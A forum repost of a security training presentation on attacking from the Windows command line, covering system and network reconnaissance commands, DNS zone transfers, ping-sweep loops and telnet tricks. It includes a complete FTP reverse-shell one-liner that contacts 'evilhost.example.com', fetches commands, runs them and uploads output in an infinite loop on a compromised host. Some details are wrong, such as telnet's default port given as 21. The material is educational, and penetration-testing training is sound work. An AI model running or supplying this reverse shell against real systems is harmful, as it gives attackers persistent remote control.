Jump to content
begood

Hacking Without Tools: Windows

Recommended Posts

Posted

Chris Clymer, CISSP

ChrisClymer.com/articles/hacking_windows

Who am I?

  • I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA
  • I'm not even very good at Minesweeper
  • I'm a UNIX geek
  • I love the command line
  • How much you ask?
  • This entire presentation was created by writing out HTML markup by hand in the Vim text editor

Why are you getting Windows tips from a UNIX guy?

  • It turns out that for some reason, not every system runs UNIX
  • In fact, the ones we're most concerned about in Information Security are often running Windows (strange!)
  • Bearded UNIX guys need to get cozy in the WIN32 world
  • Windows veterans benefit from learning to better leverage their OS's CLI
  • This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe"

Why hack without your tools?

  • You can't always guarantee that you'll have your toolbox available
  • Relying on your tools can limit you
  • You want to impress women with your leet CLI skills
  • The vast majority of the commands I will show you today should work on a typical modern Windows installation

Our friend command.exe

  • This lab will focus on command.exe
  • Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms
  • You can launch it by going to Start -> Run -> cmdcommand.png

Our Building Blocks

  • Find \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitive
  • Ping -n 5 host - sends 5 ICMP ping packets to host
  • Telnet host port - spawns an interactive telnet session to host. If is specified, this is used instead of the default Telnet port of 21

Command Control and Redirection

  • command1 & command2 - Run command1 and then command2
  • command1 && command2 - Run command1 only if command2 runs successfully
  • command1 || command2 - Execute command1 only when command2 does NOT run successfully
  • command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist.
  • command >> "output.txt" - Concatenate output from command onto the end of file "output.txt"
  • command1 | command2 - Pipe the output of command1 into command2
  • You can direct the errors from a command using 2> errors.txt

System Reconnaissance

  • set - show environment variables
  • net user - show local users
  • net localgroups - show local groups
  • sc query - list running services
  • sc query state= all - list all services
  • wmic process list full - show details on all running processes
  • tasklist /svc - show all running processess and associated services

Network Reconnaissance

  • netstat -nao - show all current network activity, including PID's
  • netsh firewall show config - display windows firewall configuration
  • ipconfig /displaydns - systems this host has recently resolved through DNS
  • arp -a - systems on the same subnet this host has recently communicated with
  • nslookup - all purpose DNS query tool

Let's Try One

  • Clear your DNS cache: ipconfig /flushdns
  • ipconfig /displaydns should only show your localhost:nodnscache.png

Let's Try One

  • Now lets add an entry: ping google.com
  • Another ipconfig /displaydns should show the new entry for google.comgooglednscache.png

More on Nslookup

  • nslookup some host - will lookup that host in DNS based on your localhost's DNS configuration
  • nslookup - starts nslookup in interactive mode
  • set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR.
  • ls -d example.com - if the server allows it, does a zone transfer of example.com
  • ls -t example.com - will give a list of member servers from the domain

Fun with Telnet!

  • Telnet is just an outdated, insecure remote administration tool right?
  • What happens when you telnet to a port other than 21?
  • Turns out many protocols are simple enough to interact with over telnet
  • Telnet can stand in for Netcat for 1-way communication with remote hosts

Lets test out some HTTP

  • You won'y be able to see what you're typing once you've started telnet
  • First type GET /index.html http/1.1 and hit returnhttprequest.png

Lets test out some HTTP

  • You should see something like the response belowhttpresponse.png

Lets test out some BAD HTTP

  • This time we'll type GET blahhttpbadquery.png
  • This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages

What about SMTP?

  • Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25
  • Now that we're talking to the server we'll start the session by typing EHLO and then hitting entersmtp.png
  • type quit when ready to end the session
  • If you know your SMTP syntax, you can send email this way

Telnet isn't the only choice

  • Many default Windows CLI apps can interact with a network
  • Many of these offer shell-like functionality and flexibility
  • These apps can fill your Netcat niche when uploading nc.exe isn't an option

Reverse shell using FTP

echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >>

ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt

& echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L

%i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F

"delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del

commands.txt) & ping -n 4 127.0.0.1)

Explanation of FTP Reverse Shell

  • This command will be run on a compromised host
  • The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"
  • Next it will upload the content of "output.txt" to evilhost
  • Finally it will download "commands.txt" from evilhost, and run whatever is inside
  • All of this is done in an infinite loop
  • As long as the commands in "commands .txt" direct their output to "output.txt" evilhost will get the results

Lets Talk About Loops

  • FOR /L - these loops are counters:
  • FOR /L %i in (1,1,10) echo "Hello World" - prints "Hello World" 10 times
  • FOR /F - these loops are iterators
  • FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line

Neat Shell Control Tricks

  • FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0
  • ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand-in

Network Scanning with Ping

  • FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
  • This command will ping every host from 10.10.10.1 - 10.10.10.255
  • By using find to parse through the results for "Reply" we only see the hosts which are responding
  • By using @ping we prevent the ping commands themselves from showing in the terminalping.png

Reverse DNS Lookups

  • FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
  • Once again we're iterating through all hosts in the 10.10.10.0/24 network
  • This time we will first echo each hosts IP to the terminal
  • Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output!
  • Searching through the results for "Name" gets us the part we care aboutreversedns.png

Other Useful Commands

  • type - show the contents of a file
  • openfiles /local on - enable openfiles logging(requires reboot)
  • openfiles /query /v - show details on all open files
  • reg query [KeyName] - display value of registry key [KeyName]
  • net use - mount fileshare

Resources

SANS 560

  • If you found this lab useful, I strongly reccomend taking Ed Skoudis's SANS 560 course
  • Ed is the best resource I have found for this sort of usage of the Windows CLI
  • Much of this lab was based on my experience taking the 560 course
  • Ed's 1-day Windows Scripting course covers this material as well
  • Plus he's got much better war stories than I do!

Hacking From the Windows Command Line

  • Downvote 1
Posted

bookmarked, exceptional, de mult voiam asa ceva si este foarte foarte folositor!

You can't always guarantee that you'll have your toolbox available

Relying on your tools can limit you

11/10

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...